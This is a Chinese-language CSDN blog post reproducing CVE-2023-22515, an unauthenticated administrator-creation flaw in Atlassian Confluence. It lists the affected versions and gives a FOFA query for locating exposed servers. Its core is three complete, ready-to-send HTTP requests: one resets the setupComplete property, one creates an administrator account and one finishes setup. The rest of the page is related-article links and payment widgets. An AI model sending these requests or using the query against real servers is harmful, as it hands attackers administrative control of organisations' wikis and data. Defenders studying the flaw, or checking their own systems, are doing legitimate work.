Confluence未授权管理用户添加 (CVE-2023-22515)

于 2024-01-18 10:34:35 发布
阅读量392 收藏 5
点赞数 10
分类专栏: 漏洞集合 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32947907/article/details/135667654
版权

漏洞简介

Confluence 是由Atlassian公司开发的企业协作和文档管理工具。

2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。

影响版本

8.0.0 <= Confluence Data Center and Confluence Server <= 8.0.4
8.1.0 <= Confluence Data Center and Confluence Server <= 8.1.4
8.2.0 <= Confluence Data Center and Confluence Server <= 8.2.3
8.3.0 <= Confluence Data Center and Confluence Server <= 8.3.2
8.4.0 <= Confluence Data Center and Confluence Server <= 8.4.2
8.5.0 <= Confluence Data Center and Confluence Server <= 8.5.1

网络空间测绘查询

fofa:

app="ATLASSIAN-Confluence"

漏洞复现

先覆盖目标Confluence服务器中的bootstrapStatusProvider.applicationConfig.setupComplete属性:

GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: IP:PORT
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Connection: close
Cache-Control: max-age=0

然后新建管理员账户

POST /setup/setupadministrator.action HTTP/1.1
Host: IP:PORT
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 110
X-Atlassian-Token: no-check

username=tbssec&fullName=tbssec&email=admin%40tbssec.com&password=tbssec&confirm=tbssec&setup-next-button=Next

接着完成安装请求

POST /setup/finishsetup.action HTTP/1.1
Host: IP:PORT
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
X-Atlassian-Token: no-check

专注分享安全知识和在工作中遇到的一些问题,大家可以关注一下我的微信公众号,一同进步,谢谢大家!

Notadmin20
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Confluence的权限管理
Lakers2015的博客
11-08 6140
Confluence 权限设置基础
Confluence 用户管理
Swarb的博客:低头做事,抬头做人
10-18 318
为更好的管理同类型用户及权限,建议为用户指定所属用户组(用户组等同于用户角色)填写必要信息,点击“添加”按钮,即可完成用户创建。Confluence管理用户管理添加用户Confluence管理用户管理→编辑组。
漏洞复现--Confluence授权管理用户添加 (CVE-2023-22515)
qq_53003652的博客
10-16 1948
2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。Atlassian Confluence是企业广泛使用的wiki系统。nuclei已上线该yaml (CVE-2023-22515)此时用户已经创建完毕,登录。
Confluence授权管理用户添加漏洞复现 (CVE-2023-22515)
holyxp的博客
11-02 791
Atlassian Confluence是企业广泛使用的wiki系统。 2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。
Confluence 授权漏洞分析(CVE-2023-22515)
2301_80115097的博客
11-28 172
在处理完上述工作后,Struts2 就会调用拦截器链中的拦截器,这些拦截器会根据用户请求参数值去更新 ValueStack 对象顶层节点的相应属性的值,最后会传到 Action 对象,并将 ValueStack 对象中的属性值,赋给 Action 类的相应属性。总的来说, 因为 方法的一些逻辑问题, 导致这个类自身对传入参数的过滤并没有生效, 我们最终还是可以通过 的形式去调用当前 action 的 getter / setter, 并不需要关心方法本身或者它的 returnType 是否使用了 注解。
(转)Confluence 授权 RCE (CVE-2019-3396) 漏洞分析
葡萄城技术团队博客
04-16 1873
看到官方发布了预警,于是开始了漏洞应急。漏洞描述中指出Confluence Server与Confluence Data Center中的Widget Connector存在服务端模板注入漏洞,攻击者能利用此漏洞能够实现目录穿越与远程代码执行。 确认漏洞点是Widget Connector,下载最新版的比对补丁,发现在com\atlassian\confluence\extra\widget...
[confluence插件] drawio-confluence-plugin-11.2.5.ocr
07-07
drawio-confluence-plugin-11.2.5 drawio-confluence-plugin-11.2.5 drawio-confluence-plugin-11.2.5 drawio-confluence-plugin-11.2.5 drawio-confluence-plugin-11.2.5 drawio-confluence-plugin-11.2.5 drawio-...
confluence-html-to-md:Confluence 导出 html 到 Markdown 转换器
06-25
Confluence 导出 html 到 Markdown 转换器 安装 npm i -g princed/confluence-html-to-md 用法 在包含从 Confluence 导出confluence-html-to-md文件夹中运行confluence-html-to-md 。
如何整合Jira跟confluence用户管理
10-10
手把手教你如何整合jira+confluence用户管理,实现jira+confluence使用同一套用户
Confluence_7-4-0用户指导和管理员手册
09-25
Confluence 7.4 用户指导与管理员手册》是一份详尽的指南,专为Confluence 7.4版本的用户管理员设计。Confluence是一款强大的企业级wiki平台,由Atlassian公司开发,用于团队协作、知识管理和文档共享。这份手册...
Confluence7.16权限管理
耕耘
04-20 3496
1. 用户和组 用户是值可以登录Confluence系统的独立个体。 站点管理员在管理页面上通过“管理用户”来创建一个新用户,或者使用jira的账号来同步账号信息。 为了方便管理,可以将用户添加到组。在管理页面上的“管理组”,可以创建新组,将用户添加到组中,组中的用户将具有这个组拥有的任何权限。 2.“匿名”用户: “匿名”用户实际上不是一个真实的用户,尽管它被放到权限管理页面上。“匿名”不仅表示所有系统中的用户,也代表任何没有登录系统的人。 3. Confluence两个特殊的组:conflu
Alibaba Nacos授权添加用户
自强不息
07-03 705
生活包含着更广阔的意义,而不在于我们实际得到了什么;关键是我们的心灵是否充实。
Confluence授权模板注入/代码执行(CVE-2019-3396)
公众号shadow sock7
04-04 6637
https://jira.atlassian.com/browse/CONFSERVER-57974 https://github.com/knownsec/pocsuite3/blob/master/pocsuite3/pocs/20190404_WEB_Confluence_path_traversal.py Poc POST /rest/tinymce/1/macro/preview HTT...
使用confluence API创建用户方法
henley_xi的博客
06-14 1419
confluence 批量添加用户
Confluence 6 权限设置
HONEY MOOSE
04-07 1042
备注:当 '外部用户管理' 权限没有被选择的时候,你仅可以指派 LDAP 用户到本地用户组中。只读(Read Only)从你目录服务器上获得 LDAP 用户用户组只能通过你的目录服务器进行修改。你不能通过应用程序的界面对你的用户用户组,用户组成员进行修改后修改同步更新 LDAP 服务器。本地用户组只读(Read Only, with Local Groups)从你目录服务器上获得 LDAP 用...
confluence权限_JIRA+Conf账户登录及常见权限问题解决办法
weixin_29343657的博客
01-12 2251
关注我,分享给你更多技能哈喽X工,我想要这个空间的权限找谁呀?这个项目的空间我没权限咋办呀……在大家熟悉jira、confluence的时候我们总会被问到这样的问题除了操作指南,其实账号权限的问题也是大家应该了解到的。为了方便大家的使用,提高响应速度,现在我们把 jira 和 confluence 的常见权限问题解决办法给到大家SWTC全员按域账号自动开通权限,无需申请以下为常见...
Confluence用户权限管理
Bruce小鬼
03-08 5513
Confluence用户权限管理 1.概述 介绍用户管理用户管理以及他们的权限管理。 2.用户管理 2.1.用户新增 可以通过用户列表查看系统已有的用户,选择某个用户可以编辑他们的信息 添加用户:可以手动添加用户 邀请用户:可以通过邮件方式邀请用户加入 用户注册:可以开启用户注册权限,让用户自己注册 3.用户管理 通过新建用户组,将用户添加到组进行管理。只要对用户组设置权限后,组下的用户都会生效。 4.全局权限 全局权限用来配置用户组所拥有的权限。 4.1.全局权限添加用户
confluence的权限管理
weixin_34326179的博客
10-25 1183
上一篇解讲如何破解,安装confluence5.8.10,这次主要是看权限管理的实现。因为公司对知识的管理不仅是简单的分享,还要求不同权限的人看到不同的内容,所以在一开始就需要对权限这一块有所了解,以防把机密内容给到不相关的人了解。 confluence的权限分两块. 一块是用户组的概念,单一的用户可以在不同的用户组里,在更多的用户组中预示着权限更多。 如下图所示: 很明显表示张三拥...
CVE-2021-26086
最新发布
05-22
CVE-2021-26086是一个影响Atlassian Confluence Server和Data Center的高危漏洞。攻击者可以利用这个漏洞执行远程代码,可能导致服务器完全被控制。这个漏洞是因为Confluence Server和Data Center中的Ognl表达式注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值